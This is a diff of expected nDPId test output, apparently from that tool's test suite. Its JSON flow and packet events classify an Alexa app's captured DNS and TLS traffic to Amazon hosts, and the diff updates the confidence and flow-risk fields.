-00774{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976090796,"flow_last_seen":1490976090982,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1490976090982,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"s3-external-2.amazonaws.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.231.72.88"}}
+00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976090796,"flow_last_seen":1490976090982,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1490976090982,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"s3-external-2.amazonaws.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.231.72.88"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090991,"flow_last_seen":1490976090991,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976090991,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1490976090991,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976090991,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8byFAAEAGdXOsECrYNudIWKNcAbsQFQ76AAAAAKAC\/\/\/K3wAAAgQFtAQCCAoA9mHbAAAAAAEDAwg="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976091048,"flow_last_seen":1490976091048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976091048,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41821,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1490976091048,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976091048,"pkt":"AMDKkaPvePiC0\/vCCABFAAA80ahAAEAGEuysECrYNudIWKNdAbtkFLBIAAAAAKAC\/\/\/ViwAAAgQFtAQCCAoA9mHgAAAAAAEDAwg="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1441,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1490976091160,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976091160,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA0KVkAACcGFEQ250hYrBAq2AG7o1w0YmduEBUO+4AS\/\/+yAwAAAgQFmAMDCAEEAgEB"}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1442,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":3,"flow_last_seen":1490976091163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976091163,"pkt":"AMDKkaPvePiC0\/vCCABFAAAobyJAAEAGdYasECrYNudIWKNcAbsQFQ77NGJnb1AQAVf4XAAA"}
-00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976090991,"flow_last_seen":1490976091163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1490976091163,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976090991,"flow_last_seen":1490976091163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1490976091163,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1449,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1490976091217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976091217,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA0Sq8AACcG8u0250hYrBAq2AG7o117lZ8zZBSwSYAS\/\/89vAAAAgQFmAMDCAEEAgEB"}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":3,"flow_last_seen":1490976091219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976091219,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo0alAAEAGEv+sECrYNudIWKNdAbtkFLBJe5WfNFAQAVeEFQAA"}
-00891{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1454,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976090991,"flow_last_seen":1490976091345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976091345,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01306{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1456,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976090991,"flow_last_seen":1490976091346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":2942,"flow_avg_l4_payload_len":367,"midstream":0,"ts_msec":1490976091346,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","server_names":"s3-external-1.amazonaws.com,*.s3-external-1.amazonaws.com,s3-external-2.amazonaws.com,*.s3-external-2.amazonaws.com,*.s3.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com Inc., CN=*.s3-external-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"C0:51:D8:FA:6B:58:94:F2:3E:4E:7D:B2:36:5F:02:E4:F0:3F:54:FF"}}
+00917{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1454,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976090991,"flow_last_seen":1490976091345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976091345,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01332{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1456,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976090991,"flow_last_seen":1490976091346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":2942,"flow_avg_l4_payload_len":367,"midstream":0,"ts_msec":1490976091346,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","server_names":"s3-external-1.amazonaws.com,*.s3-external-1.amazonaws.com,s3-external-2.amazonaws.com,*.s3-external-2.amazonaws.com,*.s3.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com Inc., CN=*.s3-external-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"C0:51:D8:FA:6B:58:94:F2:3E:4E:7D:B2:36:5F:02:E4:F0:3F:54:FF"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1492,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976093238,"flow_last_seen":1490976093238,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976093238,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1490976093238,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1490976093238,"pkt":"AMDKkaPvePiC0\/vCCABFAABEWltAAEARM1SsECrYrBAqAaKnADUAMOTtwQkBAAABAAAAAAAAC2RwLWd3LW5hLWpzBmFtYXpvbgNjb20AAAEAAQ=="}
-00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1492,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976093238,"flow_last_seen":1490976093238,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976093238,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"dp-gw-na-js.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1492,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976093238,"flow_last_seen":1490976093238,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976093238,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"dp-gw-na-js.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1496,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1490976093355,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"ts_msec":1490976093355,"pkt":"ePiC0\/vCAMDKkaPvCABFAABr3WJAAEARsCWsECoBrBAq2AA1oqcAV3huwQmBgAABAAIAAAAAC2RwLWd3LW5hLWpzBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAAIQACwhkcC1ndy1uYcAYwDQAAQABAAAAFAAEsCBlNA=="}
-00765{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1496,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976093238,"flow_last_seen":1490976093355,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976093355,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"dp-gw-na-js.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"176.32.101.52"}}
+00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1496,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976093238,"flow_last_seen":1490976093355,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976093355,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"dp-gw-na-js.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"176.32.101.52"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1497,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976093358,"flow_last_seen":1490976093358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976093358,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1497,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1490976093358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976093358,"pkt":"AMDKkaPvePiC0\/vCCABFAAA88bJAAEAGXMysECrYsCBlNKvhAbv82ZN1AAAAAKAC\/\/+6GAAAAgQFtAQCCAoA9mLHAAAAAAEDAwg="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1501,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1490976093481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976093481,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwL+xAAOcGd56wIGU0rBAq2AG7q+GBdUC1\/NmTdnASH\/53tgAAAgQFtAEDAwY="}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1503,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1490976093486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976093486,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo8bNAAEAGXN+sECrYsCBlNKvhAbv82ZN2gXVAtlAQAVfCJwAA"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1504,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976093358,"flow_last_seen":1490976093491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1490976093491,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01338{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976093358,"flow_last_seen":1490976093953,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3594,"flow_avg_l4_payload_len":449,"midstream":0,"ts_msec":1490976093953,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","server_names":"dp-gw-na.amazon.com,dp-gw-na-js.amazon.com,dp-gw-na.amazon.co.uk,dp-gw-na.amazon.de,dp-gw-na.amazon.co.jp,dp-gw-na.amazon.in","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"fbe78c619e7ea20046131294ad087f05","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=dp-gw-na.amazon.com","fingerprint":"27:E5:06:34:82:69:BC:97:5E:28:A3:C1:5A:23:81:C7:E3:28:95:8C"}}
+00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1504,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976093358,"flow_last_seen":1490976093491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1490976093491,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01444{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976093358,"flow_last_seen":1490976093953,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3594,"flow_avg_l4_payload_len":449,"midstream":0,"ts_msec":1490976093953,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","server_names":"dp-gw-na.amazon.com,dp-gw-na-js.amazon.com,dp-gw-na.amazon.co.uk,dp-gw-na.amazon.de,dp-gw-na.amazon.co.jp,dp-gw-na.amazon.in","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"fbe78c619e7ea20046131294ad087f05","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=dp-gw-na.amazon.com","fingerprint":"27:E5:06:34:82:69:BC:97:5E:28:A3:C1:5A:23:81:C7:E3:28:95:8C"}}
 00365{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1524,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":35085,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1490976094729,"pkt":"AMDKkaPvePiC0\/vCiQ0CDAoBZRIAwMqRdPh4+ILT+8IAwMqRo+\/dFACgxgAAAAAAAAAAAAAAAAAAAAAA"}
 00174{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1524,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":35085}
-00622{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1529,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027958,"flow_last_seen":1490976030758,"flow_idle_time":120000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1490976094926,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00633{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1529,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976032763,"flow_last_seen":1490976032763,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1490976094926,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1586,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976088937,"flow_last_seen":1490976099286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":802,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1490976099286,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
